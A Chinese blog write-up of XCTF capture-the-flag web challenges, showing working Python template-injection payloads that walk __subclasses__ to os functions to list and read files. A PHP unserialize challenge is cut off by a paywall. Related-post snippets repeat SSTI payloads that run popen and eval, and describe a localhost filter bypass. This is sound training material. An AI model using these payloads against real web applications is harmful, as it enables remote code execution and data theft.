攻防世界web解题[进阶](五)

最新推荐文章于 2024-04-02 01:49:02 发布
最新推荐文章于 2024-04-02 01:49:02 发布
阅读量538 收藏 1
点赞数
分类专栏: 《从0到1:CTFer成长之路》
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46703850/article/details/114499316
版权
这篇博客介绍了CTF比赛中的Web安全题目,涉及Python模板注入和PHP反序列化两个主题。在Python模板注入部分,详细阐述了如何利用os命令执行来读取文件获取flag。而在PHP反序列化部分,解释了如何绕过__wakeup方法,最终成功获取flag。同时,还探讨了Tornado框架的使用,通过MD5加密解决访问权限问题,并分享了Flask模板注入的payload及获取flag的方法。
摘要由CSDN通过智能技术生成

攻防世界web解题[进阶](五)


介绍:记录解题过程

15.Web_python_template_injection(python 模板注入)

题目描述:暂无

python template injection
python 模板注入(ssti模板注入)

<1>. 尝试:

http://111.200.241.244:44969/{
   {
   7*7}}

在这里插入图片描述

<2>. 得到可用的类的列表:

{
   {
   ''.__class__.__mro__[2].__subclasses__()}}
  • 回显:
    在这里插入图片描述

<3>. 我们需要的是os命令执行类<class ‘os._wrap_close’>,我们要判断他所属的位置,这样才能进行索引,os命令执行再列出文件:

  • payload
{
   {
   ''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
  • 回显:
URL http://111.200.241.244:44969/['fl4g', 'index.py'] not found

<4>.读取文件flag内容:

  • payload:
{
   {
   ''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}
  • flag:
URL http://111.200.241.244:44969/ctf{
   f22b6844-5169-4054-b2a0-d95b9361cb57} not found

16.Web_php_unserialize( php 反序列)

题目描述:暂无

  • 首页:
<?php 
class Demo {
    
    private $file = 'index.php';
    public function __construct($file) {
    
        $this->file = $file; 
    }
    function __destruct() {
    
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() {
    
        if ($this->file !=
最低0.47元/天 解锁文章
一个平凡de人
关注
专栏目录
ssti
2h4ox1n9
05-23 982
[第三章 web进阶]SSTI {{"".__class__.__bases__[0].__subclasses__()}} 执行结果中找到 os命令执行类<class 'os._wrap_close'>从头开始复制到os那里,粘贴到word文档里搜索个128结果,下标127 {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}} 列目录 ...
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1371
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
[第三章 web 进阶] SSTI——WP
最新发布
weixin_54227009的博客
04-02 348
注:基类的子列表[127]为os(这台靶场上的python环境是127,每个python版本不一样,好比python3.9貌似没os了)4、测试是否存在模板注入url?password={{2*2}}2、进入网页发现password is wrong。3、猜测password为参数。查看当前目录下有那些文件。1、题目提示为SSTI
Buuctf [第三章 web进阶]SSTI 20
CyhDl666的博客
03-19 1544
进入页面用arjun扫描一下有什么url参数 这道题是最基础的了 直接给payload前面的payload吧 {{''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')}} 页面返回:password is wrong: app bin boot dev etc home lib lib64 media m.
第三章 web进阶n1book
qq_51558360的博客
03-07 724
[第三章 web进阶]Python里的SSRF 直接按照提示来: 127.0.0.1是被禁止的 用0.0.0.0代替127.0.0.1就是成功了, 127.0.0.1是本机的环回地址,0.0.0.0代表本机上任何IP地址,因此可以利用0.0.0.0来绕过127.0.0.1的过滤。 本题有多重解法 - `0.0.0.0:8000` 绕过 - `[::1]:8000` 绕过(需要支持 ipv6) - 重定向跳转到 `127.0.0.1:8000` - dns rebinding 输入一个域名,第
【BUUCTF N1BOOK】[第三章 web进阶] 通关
人若无名,便可专心练剑
02-09 1320
N1BOOK是Nu1L Team为方便读者打造的免费平台,读者可在上面享受书籍相关资源以及查阅勘误。
攻防世界 web高手进阶区 10分题 url
闵行小鱼塘
10-19 1627
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是url的writeup
攻防世界 web高手进阶区 10分题 TimeKeeper
闵行小鱼塘
10-19 1450
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是TimeKeeper的writeup
攻防世界 web高手进阶区 10分题 xss1
闵行小鱼塘
11-10 771
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是xss1的writeup
攻防世界 web高手进阶区 10分题 biscuiti-300
闵行小鱼塘
11-07 1085
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是biscuiti-300的writeup
【XCTF 攻防世界WEB 高手进阶区 shrine(ssti,待补充)
weixin_45844670的博客
09-01 861
关于ssti的详解: (url先空着,正在写) 打开页面就是一段源码,右键查看下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config,猜测这就是flag, 如果没有过滤可以直接{{config}}即可查看所有app.config内容, 但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 @app.route
服务器模板注入 (SSTI)
since_2020的博客
09-08 302
服务器模板注入 (SSTI) 基本注入流程 ''.__class__ 显示这个东西的类 ''.__class__.base__ 找到这个的基类 ''.__class__.__base__.__subclasses__() 看基类的子类 敏感子类 popen、sys、os 因为''.__class__.__base__.__subclasses__()返回的是一个列表, 所以直接''.__class__.__base__.__subclasses__()[425]查看的就是popen这个 注意
web入门--ssti
whisper921的博客
04-16 2768
web361 注入点是?name。 ?name={{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} 利用的是os._wrap_close类 得到flag ctfshow{77ca18dd-38c5-4a9c-a735-522a8af345c9} web362 可以用以下已有的函数,去得到__builtins__,然后用eval就可以了:
os.system与os.popen的用法
weixin_41893060的博客
06-29 4672
def decompress(zipFilePath,csvDir): if platform.system() == "Windows": cmd = '7z.exe x %s -o%s' % (zipFilePath, csvDir) else: cmd = '7za x %s -o%s' % (zipFilePath, csvDir) ...
记云演PHP代码审计第一关
weixin_45869407的博客
09-25 222
学习最好的方法就是记录,所以本次记录为了以后自己复习使用。 第一关代码审计 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file,
Bugku CTF——WEBSSTI学习笔记
qq_51096893的博客
12-19 4826
目录 知识前提 一.题目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些题目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF题目类型(我们今天讲解的是WEB类型中注入问题): 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
20201229攻防世界WEB高手区题目一题多解全教程通关(1-6)
qq_45290991的博客
01-08 753
001baby_web 002Trainng WWW Robots 有关robots.txt的知识可以参考:https://www.cnblogs.com/yuzhongwusan/archive/2008/12/06/1348969.html 打开robots.txt会发现它只允许俄罗斯最大的搜索引擎爬取他的flag: 我们打开BP把自己的USER-agent改为Yandex就好了: 然后访问fl0g.php就会发现我们需要的flag:cyberpeace{3084111b0
CTF SSTI 一些记录
3569
10-13 5872
https://ctftime.org/writeup/10895 https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2/   ▼▼▼Shrine(Web:solved 58/810=7.1%)▼▼▼ This writeup is written by @kazkiti_ctf GET / HTTP/1.1 Host: shri...
【BUUCTF刷题】Web解题方法总结(一)
Y1seco的博客
03-28 5426
文章目录1.堆叠注入,原理2.SQL缺省代码审计SQL注入 1.堆叠注入,原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FRO
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值